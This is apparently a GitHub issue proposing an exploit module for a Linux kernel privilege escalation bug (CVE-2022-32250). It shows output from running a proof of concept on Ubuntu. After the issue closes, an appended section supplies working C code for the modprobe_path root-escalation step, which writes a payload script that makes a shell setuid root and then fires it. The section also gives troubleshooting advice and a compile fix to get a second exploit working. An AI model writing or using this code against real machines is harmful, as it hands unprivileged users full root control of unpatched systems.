LPE nft_object UAF (CVE-2022-32250) #18468

Closed
h00die opened this issue Oct 18, 2023 · 1 comment
Labels
suggestion-module New module suggestions

Comments

h00die commented Oct 18, 2023

Summary

The more LPE, the better! Both work against Ubuntu.

Basic example

https://github.com/theori-io/CVE-2022-32250-exploit (not reviewed)

https://github.com/ysanatomic/CVE-2022-32250-LPE (not reviewed)

@h00die h00die added the suggestion-module New module suggestions label Oct 18, 2023

h00die commented Nov 15, 2024

Attempted POC 1:

git clone https://github.com/theori-io/CVE-2022-32250-exploit.git
user1@ubuntu2204:~$ uname -a
Linux ubuntu2204 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
user1@ubuntu2204:~$ cat /etc/os-release 
PRETTY_NAME="Ubuntu 22.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.2 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
user1@ubuntu2204:~$ cd CVE-2022-32250-exploit/
user1@ubuntu2204:~/CVE-2022-32250-exploit$ ./exp 


[------------------------- stage 0: Allocate stable table and set ------------------------]
[+] setting stable table1 and set
[+] setting stable table2 and set
[+] setting stable table3 and set
[+] setting stable table4 and set


[------------------------- stage 1: Leak heap address ------------------------------------]
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[-] leak failed, idkval: SPRAY-RING-000u
[-] leak failed, idkval: SPRAY-RING-001u
[+] leak successed, kmalloc-64 heap: 0xffff9fa449e6e958


[------------------------- stage 2: Leak KASLR address -----------------------------------]
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] spraying mqueue...
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] gathering mqueue...
[+] KASLR base: 0xffffffffa2dfff30
[+] modprobe addr: 0xffffffffa4c8b250


[------------------------- stage 3: Overwrite modprobe_path ------------------------------]
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] spraying mqueue...
[+] triggering UAF set and overwrite *(prevchunk+0x18)
[*] gathering mqueue...


[------------------------- stage 4: Execute Malicious File -------------------------------]
[*] current modprobe name: /sbin/modprobe
open
user1@ubuntu2204:~/CVE-2022-32250-exploit$ ls -lah /tmp/shell
-rwxrwxr-x 1 user1 user1 16K Nov 15 14:09 /tmp/shell

When trying it from the direct terminal instead of from an SSH session, I got a kernel dump and the box became unresponsive.

It's possible the patch was backported, but I don't care enough to keep looking and trying.

Attempted POC 2:

user1@ubuntu2204:~/CVE-2022-32250-LPE$ gcc -lmnl -lnftnl exploit.c -o exploit
...
exploit.c:(.text+0x17): undefined reference to `nftnl_table_alloc'

I don't feel like debugging this code to make it compile, and hope the exploit works.

@h00die h00die closed this as completed Nov 15, 2024
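The "stage 4" output above relies on the classic modprobe_path technique: once the kernel-side UAF has overwritten `modprobe_path` with the path of an attacker-controlled script, executing a file that no binfmt handler accepts and whose first four bytes are not printable makes the kernel call `request_module("binfmt-%04x")`, which runs that script as root. The listing that follows (`/tmp/shell` still owned by `user1`, mode 0775, no setuid bit) is what it looks like when that payload never ran. The following is an added example written for this issue; it is not code from either linked PoC. It covers only the userland half (prepare the payload script and the trigger file, fire the trigger, check the result) and assumes the overwrite itself is done by the exploit. The paths `/tmp/modprobe_payload` and `/tmp/modprobe_trigger` are hypothetical; `/tmp/shell` is the target the PoC output shows. On a system where the overwrite did not happen, `execve()` of the trigger simply fails with `ENOEXEC` and the check reports "no".

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Same test as printable() in fs/exec.c. */
static int kernel_printable(unsigned char c) { return c == '\n' || (c >= 32 && c < 127); }

/* Non-zero when execve() of a file with this header, after no binfmt claims it,
 * makes search_binary_handler() call request_module("binfmt-%04x") and so run
 * whatever modprobe_path names, as root. bprm->buf is zero-filled, so a file
 * shorter than four bytes is padded with NULs, which are non-printable. */
int would_request_binfmt_module(const unsigned char *hdr, size_t len)
{
    unsigned char b[4] = {0, 0, 0, 0};
    memcpy(b, hdr, len < 4 ? len : 4);
    return !(kernel_printable(b[0]) && kernel_printable(b[1]) &&
             kernel_printable(b[2]) && kernel_printable(b[3]));
}

/* The alias the kernel asks modprobe for: header bytes 2..3 read as a u16
 * (little-endian on the x86_64 target above), formatted with %04x. */
void binfmt_alias(const unsigned char *hdr, size_t len, char *out, size_t outsz)
{
    unsigned char b[4] = {0, 0, 0, 0};
    memcpy(b, hdr, len < 4 ? len : 4);
    snprintf(out, outsz, "binfmt-%04x", (unsigned)(b[2] | (b[3] << 8)));
}

static int write_file(const char *path, const void *data, size_t len, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, len);
    close(fd);
    return n == (ssize_t)len ? 0 : -1;
}

/* Payload script: what the overwritten modprobe_path must point at. It runs
 * as root with an almost empty environment, so use absolute paths. */
int prepare_payload(const char *script_path, const char *target)
{
    char buf[256];
    int n = snprintf(buf, sizeof buf, "#!/bin/sh\nchown root:root %s\nchmod 4755 %s\n",
                     target, target);
    if (n < 0 || (size_t)n >= sizeof buf) return -1;
    return write_file(script_path, buf, (size_t)n, 0755);
}

/* Trigger file: four 0xff bytes, so no binfmt handler accepts it and every
 * header byte is non-printable. It must be executable and must not sit on a
 * noexec mount, or execve() fails with EACCES before the binfmt search. */
int prepare_trigger(const char *trigger_path)
{
    static const unsigned char magic[4] = {0xff, 0xff, 0xff, 0xff};
    return write_file(trigger_path, magic, sizeof magic, 0755);
}

/* execv() the trigger in a child; the exec is expected to fail and the child
 * reports errno as its exit status (ENOEXEC in the normal case). */
int fire_trigger(const char *trigger_path)
{
    pid_t pid = fork();
    if (pid == 0) {
        char *const argv[] = {(char *)trigger_path, NULL};
        execv(trigger_path, argv);
        _exit(errno & 0xff);
    }
    int status = 0;
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Success check: target is root-owned and setuid. The listing in the comment
 * above (user1:user1, mode 0775) is what a never-run payload looks like. */
int payload_ran(const char *target)
{
    struct stat st;
    if (stat(target, &st) != 0) return 0;
    return st.st_uid == 0 && (st.st_mode & S_ISUID) != 0;
}

int main(void)
{
    const char *script = "/tmp/modprobe_payload";  /* hypothetical paths */
    const char *trigger = "/tmp/modprobe_trigger";
    const char *target = "/tmp/shell";             /* as in the PoC output above */

    if (prepare_payload(script, target) != 0 || prepare_trigger(trigger) != 0) {
        perror("prepare");
        return 1;
    }
    int err = fire_trigger(trigger);
    printf("execv(%s): errno %d (%s)\n", trigger, err, strerror(err));
    printf("%s root-owned setuid: %s\n", target, payload_ran(target) ? "yes" : "no");
    return 0;
}
```

Build with `gcc -Wall -o modprobe_trigger modprobe_trigger.c`; it links against nothing beyond libc. Two checks worth doing before blaming the kernel-side overwrite when a PoC ends like the one above: confirm the trigger's header actually passes `would_request_binfmt_module()` (a file beginning with `#!` or plain text never reaches the modprobe call), and confirm `/tmp` is not mounted `noexec`, which turns the trigger into an `EACCES` failure before the binfmt search. Separately, for PoC 2's link error: Ubuntu's toolchain links with `--as-needed`, so `-lmnl -lnftnl` must come after `exploit.c` on the command line or the libraries are discarded and `nftnl_table_alloc` ends up undefined, which is exactly the symptom shown.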